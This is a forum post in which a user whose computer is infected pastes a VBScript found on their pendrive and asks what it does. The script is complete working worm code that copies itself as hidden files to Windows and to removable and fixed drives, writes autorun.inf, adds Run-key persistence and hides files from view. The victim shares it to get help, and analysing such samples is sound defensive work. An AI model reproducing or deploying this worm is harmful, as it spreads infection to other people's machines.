Hello everybody, i a C/C++ programmer but i have a visual basic question becasue my computer is being attacked by someone else.
I don't know what is the function of the code. Could oyu please explain to me. I only know that ifle is hidden and i cannot format or delete from my pendrive.
Below is the code: -
'mark
-
'slow and silent (sas)1.0
-
on error resume next
-
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
-
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
-
set fs = createobject("Scripting.FileSystemObject")
-
set mf = fs.getfile(Wscript.ScriptFullname)
-
set rg = createobject("WScript.Shell")
-
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","10"
-
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
-
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
-
dim text,size
-
size = mf.size
-
set text=mf.openastextstream(1,-2)
-
cc = text.readline
-
do while not text.atendofstream
-
mysource=mysource&text.readline
-
mysource=mysource & vbcrlf
-
loop
-
Set winpath = fs.getspecialfolder(0)
-
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
-
tf.attributes = 32
-
set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
-
tf.write "'ker"&vbcrlf&mysource
-
tf.close
-
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
-
tf.attributes = 39
-
Set winpath = fs.getspecialfolder(0)
-
set tf = fs.getfile(winpath & "\boot.ini")
-
tf.attributes = 32
-
set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
-
tf.write "'ker"&vbcrlf&mysource
-
tf.close
-
set tf = fs.getfile(winpath & "\boot.ini")
-
tf.attributes = 39
-
if cc = "'mark" then
-
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
-
end if
-
if cc = "'marker" then
-
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
-
end if
-
do
-
for each flashdrive in fs.drives
-
hm="'mark"
-
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
-
if(flashdrive.drivetype=2) then
-
hm = "'marker"
-
end if
-
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
-
tf.attributes =32
-
set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
-
tf.write hm&vbcrlf&mysource
-
tf.close
-
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
-
tf.attributes =39
-
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
-
tf.attributes = 32
-
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
-
tf.write atr
-
tf.close
-
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
-
tf.attributes=39
-
end if
-
rg.R
-
egWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
-
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
-
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
-
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
-
next
-
if cc <> "'mark" then
-
Wscript.sleep 10000
-
end if
-
loop while cc <> "'mark"
-
-
Any idea and recommendations is greatly appreciated by me and others.
Thanks for your help.
0 2344 Sign in to post your reply or Sign up for a free account.
Similar topics
by: dpackwood |
last post by:
Hello,
I have two different scripts that do pretty much the same thing. The main
perl script is on Windows. It runs and in the middle of it, it then calls
out another perl script that then...
|
by: hupjack |
last post by:
I finally joined the millions of cell phone users out there. I'm the 2nd
phone on what is now a family share plan. (Our two cell phones use minutes
from a central 400 minute peak time pool.)...
|
by: Akbar |
last post by:
Hey there,
Big-time curiosity issue here...
Here's the test code (it's not that long)... it's to display a large
number of image links with captions, ideally pulled in from an
external file...
|
by: Johnny Knoxville |
last post by:
I've added a favicon to my site (http://lazyape.filetap.com/) which works
fine if you add the site to favourites the normal way, but I have some
JavaScript code on a couple of pages with a link,...
|
by: Derek |
last post by:
I have the following script in a page and it gets an error in IE 6. Says
something about an invalid
argument but the line number doesn't help since I can't see the javascript
code when viewing...
|
by: ZMan |
last post by:
Scenario:
This is about debugging server side scripts that make calls to
middle-tier business DLLs. The server side scripts are legacy ASP 3.0
pages, and the DLLs are managed DLLs...
|
by: Harry Smith |
last post by:
While reading the documentation on IsStartupScriptRegistered, there is a
reference to "client startup script" as "Determines if the client startup
script is registered with the Page object."
What...
|
by: Angus |
last post by:
I have a web page with a toolbar containing a Save button. The Save
button can change contextually to be a Search button in some cases.
Hence the button name searchsavechanges.
The snippet of...
|
by: David |
last post by:
On Sun, May 4, 2008 at 4:43 AM, lev <levlozhkin@gmail.comwrote:
Hi, I started tidying up the script a bit, but there are some parts I
don't understand or look buggy. So I'm forwarding you the...
|
by: KevinADC |
last post by:
Note: You may skip to the end of the article if all you want is the perl code.
Introduction
Many websites have a form or a link you can use to download a file. You click a form button or click...
|
by: emmanuelkatto |
last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud.
Please let me know.
Thanks!
Emmanuel
|
by: BarryA |
last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
|
by: nemocccc |
last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
|
by: Sonnysonu |
last post by:
This is the data of csv file
1 2 3
1 2 3
1 2 3
1 2 3
2 3
2 3
3
the lengths should be different i have to store the data by column-wise with in the specific length.
suppose the i have to...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
|
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
| |